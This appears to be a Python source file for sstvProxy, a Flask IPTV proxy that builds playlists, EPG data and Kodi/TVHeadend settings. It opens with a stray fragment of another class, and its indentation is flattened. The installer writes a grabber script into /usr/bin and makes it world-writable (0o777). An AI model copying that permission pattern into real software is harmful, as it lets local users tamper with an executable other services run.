def __gao(self):
logging.info("__gao start")
data = dict()
for key in self.data.keys():
data[key] = self.func(key)
logging.info(data[key])
with self.lock.gen_wlock():
self.data = data
@staticmethod
def shutdown_all():
for obj in SchedulerCache.objects:
obj.scheduler.shutdown()
objects = []
|
sstvProxy.py | #!/usr/bin/env python3
###
###Copyright (c) 2016 by Joel Kaaberg and contributors. See AUTHORS
###for more details.
###
###Some rights reserved.
###
###Redistribution and use in source and binary forms of the software as well
###as documentation, with or without modification, are permitted provided
###that the following conditions are met:
###
###* Redistributions of source code must retain the above copyright
### notice, this list of conditions and the following disclaimer.
###
###* Redistributions in binary form must reproduce the above
### copyright notice, this list of conditions and the following
### disclaimer in the documentation and/or other materials provided
### with the distribution.
###
###* The names of the contributors may not be used to endorse or
### promote products derived from this software without specific
### prior written permission.
###
###THIS SOFTWARE AND DOCUMENTATION IS PROVIDED BY THE COPYRIGHT HOLDERS AND
###CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT
###NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
###A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
###OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
###EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
###PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
###PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
###LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
###NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
###SOFTWARE AND DOCUMENTATION, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
###DAMAGE.
###
import logging, os, sys, time, argparse, json, gzip, base64, platform, threading, subprocess, urllib, glob, sqlite3, array, socket, struct, ntpath, timeit, re
from datetime import datetime, timedelta
from json import load, dump
from logging.handlers import RotatingFileHandler
from xml.etree import ElementTree as ET
from socket import timeout
from io import StringIO
from xml.sax.saxutils import escape
import urllib.request as requests
import requests as req
import datetime as dt
HEADLESS = False
try:
from urlparse import urljoin
import thread
except ImportError:
from urllib.parse import urljoin
import _thread
from flask import Flask, redirect, abort, request, Response, send_from_directory, jsonify, render_template, \
stream_with_context, url_for
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug", action='store_true', help="Console Debugging Enable")
parser.add_argument("-hl", "--headless", action='store_true', help="Force Headless mode")
parser.add_argument("-t", "--tvh", action='store_true', help="Force TVH scanning mode")
parser.add_argument("-i", "--install", action='store_true', help="Force install again")
args = parser.parse_args()
try:
import tkinter
except:
HEADLESS = True
if args.headless or 'headless' in sys.argv:
HEADLESS = True
app = Flask(__name__, static_url_path='')
__version__ = 1.824
# Changelog
# 1.824 - Backup server prompt added for headless
# 1.823 - Added -i for install trigger
# 1.822 - Added Auto server selection to Gui.
# 1.821 - Added CHECK_CHANNEL to adv settings
# 1.82 - Advanced settings added to web page, channel scanning work
# 1.815 - Restart option fix
# 1.814 - EPG Hotfix
# 1.813 - EPG Hotfix
# 1.812 - FixUrl Fix, readded EPG override (was inadvertantly removed in a commit revert), change of epg refresh to 4hrs
# 1.811 - Dev disable
# 1.81 - Improvement to Series Category detection.
# 1.8 - Added .gz support for EXTRA XML file/url.
# 1.731 - Correction of channel return type that had been removed
# 1.73 - HTML write exception fixed for settigns page, Vaders update
# 1.72 - Auto server selection based off of ping
# 1.71 - Channel parsing catch added for missing channels
# 1.7 - Static and dynamic xspf options added ip:port/sstv/static.xspf or ip:port/sstv/playlist.xspf, changed tkinter menu
# 1.691 - Updated FOG Urls
# 1.69 - Added more info to website, removed network discovery(isn't useful).
# 1.68 - Updated for MyStreams changes
# 1.672 - Changed mpegts output default quality from 1 to what user has set.
# 1.671 - Correction of MMATV url
# 1.67 - Finished JSON to XML, fixed quality setting and settings menu form posting
# 1.66 - Added extra m3u8 to the standard Plex Live output, make sure to use combined.xml in this scenario instead too.
# 1.65 - Addition of strmtype 'mpegts' utilises ffmpeg pipe prev used only by TVH/Plex Live. Enhancement of Webpage incl update and restart buttons.
# 1.64 - Bugfixes
# 1.63 - Added catch for clients with no user agent at all
# 1.62 - xmltv merger bugfix and speedup, kodi settings overwrite disabled
# 1.61 - Addition of test.m3u8 to help identify client requirements
# 1.60 - Addition of XMLTV merger /combined.xml, TVH CHNUM addition, Addition of MMA tv auth, change of returns based on detected client
# 1.59 - Removed need for TVH redirect, added a new path IP:PORT/tvh can be used in plex instead!
# 1.58 - A single dynamic channel can be requested with /ch##.m3u8 strm/qual options are still optional is /ch1.m3u8?strm=rtmp&qual=2
# 1.57 - Index.html enhancements
# 1.56 - Addition of TVH proxy core role to this proxy, will disable SSTV to plex live though
# 1.55 - Addition of Static m3u8
# 1.54 - Adjustment to kodi dynamic url links and fix to external hls usage.
# 1.53 - Sports only epg available at /sports.xml
# 1.52 - Addition of External Port
# 1.51 - Inclusion of an m3u8 merger to add another m3u8 files contents to the end of the kodi.m3u8 playlist result is called combined.m3u8 refer advanced settings.
# 1.50 - GUI Redesign
# 1.47 - TVH scanning fixed.
# 1.46 - REmoved startup gui from mac and linux exes, fixed linux url
# 1.45 - Added restart required message, Change of piping checks, manual trigger now for easy mux detection (forcing channel 1), use 'python sstvproxy install'
# 1.44 - Change of initial launch to use the gui, if not desired launch with 'python sstvproxy.py headless'. Added adv settings parsing see advancedsettings.json for example
# 1.43 - Bugfix settings menu
# 1.42 - External Playlist added, version check and download added
# 1.41 - Bug fix and switch put on network discovery
# 1.40 - Settings menu added to /index.html
# 1.37 - Network Discovery fixed hopefully
# 1.36 - Two path bug fixes
# 1.35 - Mac addon path fix and check
# 1.34 - Fixed Plex Discovery, TVH file creation fix and addition of writing of genres and template files
# 1.33 - Typo
# 1.32 - Change server name dots to hyphens.
# 1.31 - Tidying
# 1.3 - EPG - Changed zap2it references to the channel number for better readability in clients that use that field as the channel name. As a result the epgs from both sources share the same convention. Playlist generators adjusted to suit.
# 1.2 - TVH Completion and install
# 1.1 - Refactoring and TVH inclusion
# 1.0 - Initial post testing release
############################################################
# Logging
############################################################
# Setup logging
log_formatter = logging.Formatter(
'%(asctime)s - %(levelname)-10s - %(name)-10s - %(funcName)-25s- %(message)s')
logger = logging.getLogger('SmoothStreamsProxy v' + str(__version__))
logger.setLevel(logging.DEBUG)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
# Console logging
console_handler = logging.StreamHandler()
if args.debug:
console_handler.setLevel(logging.DEBUG)
else:
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
# Rotating Log Files
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache')):
os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache'))
file_handler = RotatingFileHandler(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'),
maxBytes=1024 * 1024 * 2,
backupCount=5)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
logger.addHandler(file_handler)
opener = requests.build_opener()
opener.addheaders = [('User-agent', 'YAP - %s - %s - %s' % (sys.argv[0], platform.system(), str(__version__)))]
requests.install_opener(opener)
type = ""
latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/sstvProxy.py"
if not sys.argv[0].endswith('.py'):
if platform.system() == 'Linux':
type = "Linux/"
latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/Linux/sstvProxy"
elif platform.system() == 'Windows':
type = "Windows/"
latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/Windows/sstvproxy.exe"
elif platform.system() == 'Darwin':
type = "Macintosh/"
latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/Macintosh/sstvproxy"
url = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/%sversion.txt" % type
try:
latest_ver = float(json.loads(requests.urlopen(url).read().decode('utf-8'))['Version'])
except:
latest_ver = float(0.0)
logger.info("Latest version check failed, check internet.")
token = {
'hash': '',
'expires': ''
}
playlist = ""
class channelinfo:
epg = ""
description = ""
channum = 0
channame = ""
class programinfo:
description = ""
channel = 0
channelname = ""
height = 0
startTime = 0
endTime = 0
timeRange = ""
_title = ""
_category = ""
_quality = ""
_language = ""
def get_title(self):
if len(self._title) == 0:
return ("none " + self.timeRange).strip()
else:
return (self._title + " " + self.quality + " " + self.timeRange).replace(" ", " ").strip()
def set_title(self, title):
self._title = title
if len(self._category) == 0 or self._category == "TVShows":
if title.startswith("NHL") or "hockey" in title.lower():
self._category = "Ice Hockey"
elif title.startswith("UEFA") or title.startswith("EPL") or title.startswith(
"Premier League") or title.startswith("La Liga") or title.startswith("Bundesliga") or title.startswith(
"Serie A") or "soccer" in title.lower():
self._category = "World Football"
elif title.startswith("MLB") or "baseball" in title.lower():
self._category = "Baseball"
elif title.startswith("MMA") or title.startswith("UFC") or "boxing" in title.lower():
self._category = "Boxing + MMA"
elif title.startswith("NCAAF") or title.startswith("CFB"):
self._category = "NCAAF"
elif title.startswith("ATP") or "tennis" in title.lower():
self._category = "Tennis"
elif title.startswith("WWE"):
self._category = "Wrestling"
elif title.startswith("NFL") or title.startswith("NBA"):
self._category = title.split(" ")[0].replace(":", "").strip()
elif 'nba' in title.lower() or 'nbl' in title.lower() or 'ncaam' in title.lower()or 'basketball' in title.lower():
self._category = "Basketball"
elif 'nfl' in title.lower() or 'football' in title.lower() or 'american football' in title.lower() or 'ncaaf' in title.lower() or 'cfb' in title.lower():
self._category = "Football"
elif 'EPL' in title or 'efl' in title.lower() or 'soccer' in title.lower() or 'ucl' in title.lower() or 'mls' in title.lower() or 'uefa' in title.lower() or 'fifa' in title.lower() or 'fc' in title.lower() or 'la liga' in title.lower() or 'serie a' in title.lower() or 'wcq' in title.lower():
self._category = "Soccer"
elif 'rugby' in title.lower() or 'nrl' in title.lower() or 'afl' in title.lower():
self._category = "Rugby"
elif 'cricket' in title.lower() or 't20' in title.lower():
self._category = "Cricket"
elif 'tennis' in title.lower() or 'squash' in title.lower() or 'atp' in title.lower():
self._category = "Tennis/Squash"
elif 'f1' in title.lower() or 'nascar' in title.lower() or 'motogp' in title.lower() or 'racing' in title.lower():
self._category = "Motor Sport"
elif 'golf' in title.lower() or 'pga' in title.lower():
self._category = "Golf"
elif 'boxing' in title.lower() or 'mma' in title.lower() or 'ufc' in title.lower() or 'wrestling' in title.lower() or 'wwe' in title.lower():
self._category = "Martial Sports"
elif 'hockey' in title.lower() or 'nhl' in title.lower() or 'ice hockey' in title.lower():
self._category = "Ice Hockey"
elif 'baseball' in title.lower() or 'mlb' in title.lower() or 'beisbol' in title.lower() or 'minor league' in title.lower():
self._category = "Baseball"
elif 'news' in title.lower():
self._category = "News"
# print(title,",", self._category)
title = property(get_title, set_title)
def get_category(self):
if (len(self._category) == 0 or self._category == "none") and (
self.title.lower().find("news") or self.description.lower().find("news")) > -1:
return "News"
else:
return self._category
def set_category(self, category):
if category == "tv":
self._category = ""
else:
self._category = category
category = property(get_category, set_category)
def get_language(self):
return self._language
def set_language(self, language):
if language.upper() == "US" or language.upper() == "EN":
self._language = ""
else:
self._language = language.upper()
language = property(get_language, set_language)
def get_quality(self):
return self._quality
def set_quality(self, quality):
if quality.endswith("x1080"):
self._quality = "1080i"
self.height = 1080
elif quality.endswith("x720") or quality.lower() == "720p":
self._quality = "720p"
self.height = 720
elif quality.endswith("x540") or quality.lower() == "hqlq":
self._quality = "540p"
self.height = 540
elif quality.find("x") > 2:
self._quality = quality
self.height = int(quality.split("x")[1])
else:
self._quality = quality
self.height = 0
quality = property(get_quality, set_quality)
def get_album(self):
if self._quality.upper() == "HQLQ" and self.channelname.upper().find(" 720P") > -1:
self._quality = "720p"
return (self._category + " " + self.quality + " " + self._language).strip().replace(" ", " ")
album = property(get_album)
class EST5EDT(dt.tzinfo):
def utcoffset(self, dt):
return timedelta(hours=-5) + self.dst(dt)
def utc_seconds(self):
return self.utcoffset(datetime.now()).total_seconds()
def dst(self, dt):
d = datetime(dt.year, 3, 8) # 2nd Sunday in March
self.dston = d + timedelta(days=6 - d.weekday())
d = datetime(dt.year, 11, 1) # 1st Sunday in Nov
self.dstoff = d + timedelta(days=6 - d.weekday())
if self.dston <= dt.replace(tzinfo=None) < self.dstoff:
return timedelta(hours=1)
else:
return timedelta(0)
def tzname(self, dt):
return 'EST5EDT'
############################################################
# CONFIG
############################################################
# These are just defaults, place your settings in a file called proxysettings.json in the same directory
USER = ""
PASS = ""
SITE = "viewstvn"
SRVR = "dnaw1"
SRVR_SPARE = "dnaw1"
AUTO_SERVER = False
CHECK_CHANNEL = True
STRM = "hls"
QUAL = "1"
QUALLIMIT = 70
LISTEN_IP = "127.0.0.1"
LISTEN_PORT = 6969
SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
SERVER_PATH = "sstv"
KODIPORT = 8080
EXTIP = "127.0.0.1"
EXTPORT = 80
EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
KODIUSER = "kodi"
KODIPASS = ""
EXTM3URL = ''
EXTM3UNAME = ''
EXTM3UFILE = ''
EXTXMLURL = ''
TVHREDIRECT = False
TVHURL = '127.0.0.1'
TVHUSER = ''
TVHPASS = ''
OVRXML = ''
tvhWeight = 300 # subscription priority
tvhstreamProfile = 'pass' # specifiy a stream profile that you want to use for adhoc transcoding in tvh, e.g. mp4
GUIDELOOKAHEAD = 5 #minutes
# LINUX/WINDOWS
if platform.system() == 'Linux':
FFMPEGLOC = '/usr/bin/ffmpeg'
if os.path.isdir(os.path.join(os.path.expanduser("~"), '.kodi', 'userdata', 'addon_data', 'pvr.iptvsimple')):
ADDONPATH = os.path.join(os.path.expanduser("~"), '.kodi', 'userdata', 'addon_data', 'pvr.iptvsimple')
else:
ADDONPATH = False
elif platform.system() == 'Windows':
FFMPEGLOC = os.path.join('C:\FFMPEG', 'bin', 'ffmpeg.exe')
if os.path.isdir(os.path.join(os.path.expanduser("~"), 'AppData', 'Roaming', 'Kodi', 'userdata', 'addon_data',
'pvr.iptvsimple')):
ADDONPATH = os.path.join(os.path.expanduser("~"), 'AppData', 'Roaming', 'Kodi', 'userdata', 'addon_data',
'pvr.iptvsimple')
else:
ADDONPATH = False
elif platform.system() == 'Darwin':
FFMPEGLOC = '/usr/local/bin/ffmpeg'
if os.path.isdir(
os.path.join(os.path.expanduser("~"), "Library", "Application Support", 'Kodi', 'userdata', 'addon_data',
'pvr.iptvsimple')):
ADDONPATH = os.path.join(os.path.expanduser("~"), "Library", "Application Support", 'Kodi', 'userdata',
'addon_data', 'pvr.iptvsimple')
else:
ADDONPATH = False
else:
print("Unknown OS detected... proxy may not function correctly")
############################################################
# INIT
############################################################
serverList = [
[' EU-Mix', 'deu'],
[' DE-Frankfurt', 'deu-de'],
[' NL-Mix', 'deu-nl'],
[' NL-1', 'deu-nl1'],
[' NL-2', 'deu-nl2'],
[' NL-3 Ams', 'deu-nl3'],
[' NL-4 Breda', 'deu-nl4'],
[' NL-5 Enschede', 'deu-nl5'],
[' UK-Mix', 'deu-uk'],
[' UK-London1', 'deu-uk1'],
[' UK-London2', 'deu-uk2'],
[' US-Mix', 'dna'],
[' East-Mix', 'dnae'],
[' West-Mix', 'dnaw'],
[' East-NJ', 'dnae1'],
[' East-VA', 'dnae2'],
# [' East-Mtl', 'dnae3'],
# [' East-Tor', 'dnae4'],
[' East-NY', 'dnae6'],
[' West-Phx', 'dnaw1'],
[' West-LA', 'dnaw2'],
[' West-SJ', 'dnaw3'],
[' West-Chi', 'dnaw4'],
['Asia', 'dap'],
['Asia-Old', 'dsg']
]
vaders_channels = {"1":"2499","2":"2500","3":"2501","4":"2502","5":"2503","6":"2504","7":"2505","8":"2506","9":"2507","10":"2508","11":"2509","12":"2510","13":"2511","14":"2512","15":"2513","16":"2514","17":"2515","18":"2516","19":"2517","20":"2518","21":"2519","22":"2520","23":"2521","24":"2522","25":"2523","26":"2524","27":"2525","28":"2526","29":"2527","30":"2528","31":"2529","32":"2530","33":"2531","34":"2532","35":"2533","36":"2534","37":"2535","38":"2536","39":"2537","40":"2538","41":"2541","42":"2542","43":"2543","44":"2544","45":"2545","46":"2546","47":"2547","48":"2548","49":"2549","50":"2550","51":"2551","52":"2552","53":"2553","54":"2554","55":"2555","56":"2556","57":"2557","58":"2606","59":"2607","60":"2608","61":"2609","62":"2610","63":"2611","64":"2612","65":"2613","66":"2614","67":"2615","68":"2616","69":"2617","70":"2618","71":"2619","72":"2620","73":"2622","74":"2621","75":"2623","76":"2624","77":"2625","78":"2626","79":"2627","80":"2628","81":"2629","82":"2630","83":"2631","84":"2632","85":"2633","86":"2634","87":"2635","88":"2636","89":"2637","90":"2638","91":"2639","92":"2640","93":"2641","94":"2642","95":"2643","96":"2644","97":"2645","98":"2646","99":"2647","100":"2648","101":"2649","102":"2650","103":"2651","104":"2652","105":"2653","106":"2654","107":"2655","108":"2656","109":"2657","110":"2658","111":"2659","112":"2660","113":"2661","114":"2662","115":"2663","116":"2664","117":"2665","118":"2666","119":"2667","120":"2668","121":"47381","122":"2679","123":"2680","124":"2681","125":"2682","126":"47376","127":"47377","128":"47378","129":"47379","130":"47380","131":"47718","132":"47719","133":"49217","134":"50314","135":"50315","136":"50319","137":"50320","138":"50321","139":"50322","141":"49215","140":"50394","142":"49216","143":"50395","144":"50396","145":"50397","146":"50398","147":"50399","148":"47707","149":"47670","150":"47716"}
providerList = [
['Live247', 'view247'],
['Mystreams', 'vaders'],
['StarStreams', 'viewss'],
['StreamTVnow', 'viewstvn'],
['MMA-TV/MyShout', 'viewmmasr']
]
streamtype = ['hls', 'rtmp', 'mpegts']
qualityList = [
['HD', '1'],
['HQ', '2'],
['LQ', '3']
]
def adv_settings():
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'advancedsettings.json')):
logger.debug("Parsing advanced settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'advancedsettings.json')) as advset:
advconfig = load(advset)
if "kodiuser" in advconfig:
logger.debug("Overriding kodi username")
global KODIUSER
KODIUSER = advconfig["kodiuser"]
if "kodipass" in advconfig:
logger.debug("Overriding kodi password")
global KODIPASS
KODIPASS = advconfig["kodipass"]
if "ffmpegloc" in advconfig:
logger.debug("Overriding ffmpeg location")
global FFMPEGLOC
FFMPEGLOC = advconfig["ffmpegloc"]
if "kodiport" in advconfig:
logger.debug("Overriding kodi port")
global KODIPORT
KODIPORT = advconfig["kodiport"]
if "extram3u8url" in advconfig:
logger.debug("Overriding EXTM3URL")
global EXTM3URL
EXTM3URL = advconfig["extram3u8url"]
if "extram3u8name" in advconfig:
logger.debug("Overriding EXTM3UNAME")
global EXTM3UNAME
EXTM3UNAME = advconfig["extram3u8name"]
if "extram3u8file" in advconfig:
logger.debug("Overriding EXTM3UFILE")
global EXTM3UFILE
EXTM3UFILE = advconfig["extram3u8file"]
if "extraxmlurl" in advconfig:
logger.debug("Overriding EXTXMLURL")
global EXTXMLURL
EXTXMLURL = advconfig["extraxmlurl"]
if "tvhredirect" in advconfig:
logger.debug("Overriding tvhredirect")
global TVHREDIRECT
TVHREDIRECT = advconfig["tvhredirect"]
if "tvhaddress" in advconfig:
logger.debug("Overriding tvhaddress")
global TVHURL
TVHURL = advconfig["tvhaddress"]
if "tvhuser" in advconfig:
logger.debug("Overriding tvhuser")
global TVHUSER
TVHUSER = advconfig["tvhuser"]
if "tvhpass" in advconfig:
logger.debug("Overriding tvhpass")
global TVHPASS
TVHPASS = advconfig["tvhpass"]
if "overridexml" in advconfig:
logger.debug("Overriding XML")
global OVRXML
OVRXML = advconfig["overridexml"]
if "checkchannel" in advconfig:
logger.debug("Overriding CheckChannel")
global CHECK_CHANNEL
CHECK_CHANNEL = advconfig["checkchannel"] == "True"
def load_settings():
global QUAL, QUALLIMIT, USER, PASS, SRVR,SRVR_SPARE, SITE, STRM, KODIPORT, LISTEN_IP, LISTEN_PORT, SERVER_HOST, EXTIP, EXT_HOST, EXTPORT
if not os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')):
logger.debug("No config file found.")
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')) as jsonConfig:
config = {}
config = load(jsonConfig)
if "quality" in config:
QUAL = config["quality"]
if "username" in config:
USER = config["username"]
if "password" in config:
PASS = config["password"]
if "server" in config:
SRVR = config["server"]
if "server_spare" in config:
SRVR_SPARE = config["server_spare"]
if "service" in config:
SITE = config["service"]
if SITE == "mmatv":
SITE = "viewmmasr"
if "stream" in config:
STRM = config["stream"]
if "kodiport" in config:
KODIPORT = config["kodiport"]
if "externalip" in config:
EXTIP = config["externalip"]
if "externalport" in config:
EXTPORT = config["externalport"]
if "ip" in config and "port" in config:
LISTEN_IP = config["ip"]
LISTEN_PORT = config["port"]
SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
logger.debug("Using config file.")
except:
if HEADLESS:
config = {}
config["username"] = input("Username?")
USER = config["username"]
config["password"] = input("Password?")
PASS = config["password"]
os.system('cls' if os.name == 'nt' else 'clear')
print("Type the number of the item you wish to select:")
for i in providerList:
print(providerList.index(i), providerList[providerList.index(i)][0])
config["service"] = providerList[int(input("Provider name?"))][1]
os.system('cls' if os.name == 'nt' else 'clear')
SITE = config["service"]
print("Type the number of the item you wish to select:")
for i in serverList:
print(serverList.index(i), serverList[serverList.index(i)][0])
result = input("Regional Server name? (or type 'auto')")
if result.lower() == 'auto':
testServers()
config["server"] = SRVR
config["server_spare"] = SRVR_SPARE
else:
config["server"] = serverList[int(result)][1]
os.system('cls' if os.name == 'nt' else 'clear')
for i in serverList:
print(serverList.index(i), serverList[serverList.index(i)][0])
result = input("Backup Regional Server name?")
config["server_spare"] = serverList[int(result)][1]
os.system('cls' if os.name == 'nt' else 'clear')
print("Type the number of the item you wish to select:")
for i in streamtype:
print(streamtype.index(i), i)
config["stream"] = streamtype[int(input("Dynamic Stream Type? (HLS/RTMP)"))]
os.system('cls' if os.name == 'nt' else 'clear')
for i in qualityList:
print(qualityList.index(i), qualityList[qualityList.index(i)][0])
config["quality"] = qualityList[int(input("Stream quality?"))][1]
os.system('cls' if os.name == 'nt' else 'clear')
config["ip"] = input("Listening IP address?(ie recommend 127.0.0.1 for beginners)")
config["port"] = int(input("and port?(ie 99, do not use 8080)"))
os.system('cls' if os.name == 'nt' else 'clear')
config["externalip"] = input("External IP?")
config["externalport"] = int(input("and ext port?(ie 99, do not use 8080)"))
os.system('cls' if os.name == 'nt' else 'clear')
QUAL = config["quality"]
SRVR = config["server"]
STRM = config["stream"]
LISTEN_IP = config["ip"]
LISTEN_PORT = config["port"]
EXTIP = config["externalip"]
EXTPORT = config["externalport"]
SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json'), 'w') as fp:
dump(config, fp)
else:
root = tkinter.Tk()
root.title("YAP Setup")
# root.geometry('750x600')
app = GUI(root) # calling the class to run
root.mainloop()
installer()
adv_settings()
if args.install:
installer()
############################################################
# INSTALL
############################################################
def installer():
if os.path.isfile(os.path.join('/usr', 'bin', 'tv_find_grabbers')):
writetvGrabFile()
os.chmod('/usr/bin/tv_grab_sstv', 0o777)
proc = subprocess.Popen("/usr/bin/tv_find_grabbers")
if os.path.isdir(ADDONPATH):
writesettings()
writegenres()
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'Templates')):
os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'Templates'))
writetemplate()
def writetvGrabFile():
f = open(os.path.join('/usr', 'bin', 'tv_grab_sstv'), 'w')
tvGrabFile = '''#!/bin/sh
dflag=
vflag=
cflag=
#Save this file into /usr/bin ensure HTS user has read/write and the file is executable
URL="%s/%s/epg.xml"
DESCRIPTION="SmoothStreamsTV"
VERSION="1.1"
if [ $# -lt 1 ]; then
wget -q -O - $URL
exit 0
fi
for a in "$@"; do
[ "$a" = "-d" -o "$a" = "--description" ] && dflag=1
[ "$a" = "-v" -o "$a" = "--version" ] && vflag=1
[ "$a" = "-c" -o "$a" = "--capabilities" ] && cflag=1
done
if [ -n "$dflag" ]; then
echo $DESCRIPTION
fi
if [ -n "$vflag" ]; then
echo $VERSION
fi
if [ -n "$cflag" ]; then
echo "baseline"
fi''' % (SERVER_HOST, SERVER_PATH)
f.write(tvGrabFile)
f.close()
# lazy install, low priority
def writesettings():
f = open(os.path.join(ADDONPATH, 'settings.xml'), 'w')
xmldata = """<settings>
<setting id="epgCache" value="false" />
<setting id="epgPath" value="" />
<setting id="epgPathType" value="1" />
<setting id="epgTSOverride" value="true" />
<setting id="epgTimeShift" value="0.0" />
<setting id="epgUrl" value="%s/%s/epg.xml" />
<setting id="logoBaseUrl" value="" />
<setting id="logoFromEpg" value="1" />
<setting id="logoPath" value="" />
<setting id="logoPathType" value="1" />
<setting id="m3uCache" value="true" />
<setting id="m3uPath" value="" />
<setting id="m3uPathType" value="1" />
<setting id="m3uUrl" value="%s/%s/kodi.m3u8" />
<setting id="sep1" value="" />
<setting id="sep2" value="" />
<setting id="sep3" value="" />
<setting id="startNum" value="1" />
</settings>""" % (SERVER_HOST, SERVER_PATH, SERVER_HOST, SERVER_PATH)
f.write(xmldata)
f.close()
def writegenres():
f = open(os.path.join(ADDONPATH, 'genres.xml'), 'w')
xmldata = """<genres>
<!---UNDEFINED--->
<genre type="00">Undefined</genre>
<!---MOVIE/DRAMA--->
<genre type="16">Movie/Drama</genre>
<genre type="16" subtype="01">Detective/Thriller</genre>
<genre type="16" subtype="02">Adventure/Western/War</genre>
<genre type="16" subtype="03">Science Fiction/Fantasy/Horror</genre>
<genre type="16" subtype="04">Comedy</genre>
<genre type="16" subtype="05">Soap/Melodrama/Folkloric</genre>
<genre type="16" subtype="06">Romance</genre>
<genre type="16" subtype="07">Serious/Classical/Religious/Historical Movie/Drama</genre>
<genre type="16" subtype="08">Adult Movie/Drama</genre>
<!---NEWS/CURRENT AFFAIRS--->
<genre type="32">News/Current Affairs</genre>
<genre type="32" subtype="01">News/Weather Report</genre>
<genre type="32" subtype="02">News Magazine</genre>
<genre type="32" subtype="03">Documentary</genre>
<genre type="32" subtype="04">Discussion/Interview/Debate</genre>
<!---SHOW--->
<genre type="48">Show/Game Show</genre>
<genre type="48" subtype="01">Game Show/Quiz/Contest</genre>
<genre type="48" subtype="02">Variety Show</genre>
<genre type="48" subtype="03">Talk Show</genre>
<!---SPORTS--->
<genre type="64">Sports</genre>
<genre type="64" subtype="01">Special Event</genre>
<genre type="64" subtype="02">Sport Magazine</genre>
<genre type="96" subtype="03">Football</genre>
<genre type="144">Tennis/Squash</genre>
<genre type="64" subtype="05">Team Sports</genre>
<genre type="64" subtype="06">Athletics</genre>
<genre type="160">Motor Sport</genre>
<genre type="64" subtype="08">Water Sport</genre>
<genre type="64" subtype="09">Winter Sports</genre>
<genre type="64" subtype="10">Equestrian</genre>
<genre type="176">Martial Sports</genre>
<genre type="16">Basketball</genre>
<genre type="32">Baseball</genre>
<genre type="48">Soccer</genre>
<genre type="80">Ice Hockey</genre>
<genre type="112">Golf</genre>
<genre type="128">Cricket</genre>
<!---CHILDREN/YOUTH--->
<genre type="80">Children's/Youth Programmes</genre>
<genre type="80" subtype="01">Pre-school Children's Programmes</genre>
<genre type="80" subtype="02">Entertainment Programmes for 6 to 14</genre>
<genre type="80" subtype="03">Entertainment Programmes for 16 to 16</genre>
<genre type="80" subtype="04">Informational/Educational/School Programme</genre>
<genre type="80" subtype="05">Cartoons/Puppets</genre>
<!---MUSIC/BALLET/DANCE--->
<genre type="96">Music/Ballet/Dance</genre>
<genre type="96" subtype="01">Rock/Pop</genre>
<genre type="96" subtype="02">Serious/Classical Music</genre>
<genre type="96" subtype="03">Folk/Traditional Music</genre>
<genre type="96" subtype="04">Musical/Opera</genre>
<genre type="96" subtype="05">Ballet</genre>
<!---ARTS/CULTURE--->
<genre type="112">Arts/Culture</genre>
<genre type="112" subtype="01">Performing Arts</genre>
<genre type="112" subtype="02">Fine Arts</genre>
<genre type="112" subtype="03">Religion</genre>
<genre type="112" subtype="04">Popular Culture/Traditional Arts</genre>
<genre type="112" subtype="05">Literature</genre>
<genre type="112" subtype="06">Film/Cinema</genre>
<genre type="112" subtype="07">Experimental Film/Video</genre>
<genre type="112" subtype="08">Broadcasting/Press</genre>
<genre type="112" subtype="09">New Media</genre>
<genre type="112" subtype="10">Arts/Culture Magazines</genre>
<genre type="112" subtype="11">Fashion</genre>
<!---SOCIAL/POLITICAL/ECONOMICS--->
<genre type="128">Social/Political/Economics</genre>
<genre type="128" subtype="01">Magazines/Reports/Documentary</genre>
<genre type="128" subtype="02">Economics/Social Advisory</genre>
<genre type="128" subtype="03">Remarkable People</genre>
<!---EDUCATIONAL/SCIENCE--->
<genre type="144">Education/Science/Factual</genre>
<genre type="144" subtype="01">Nature/Animals/Environment</genre>
<genre type="144" subtype="02">Technology/Natural Sciences</genre>
<genre type="144" subtype="03">Medicine/Physiology/Psychology</genre>
<genre type="144" subtype="04">Foreign Countries/Expeditions</genre>
<genre type="144" subtype="05">Social/Spiritual Sciences</genre>
<genre type="144" subtype="06">Further Education</genre>
<genre type="144" subtype="07">Languages</genre>
<!---LEISURE/HOBBIES--->
<genre type="160">Leisure/Hobbies</genre>
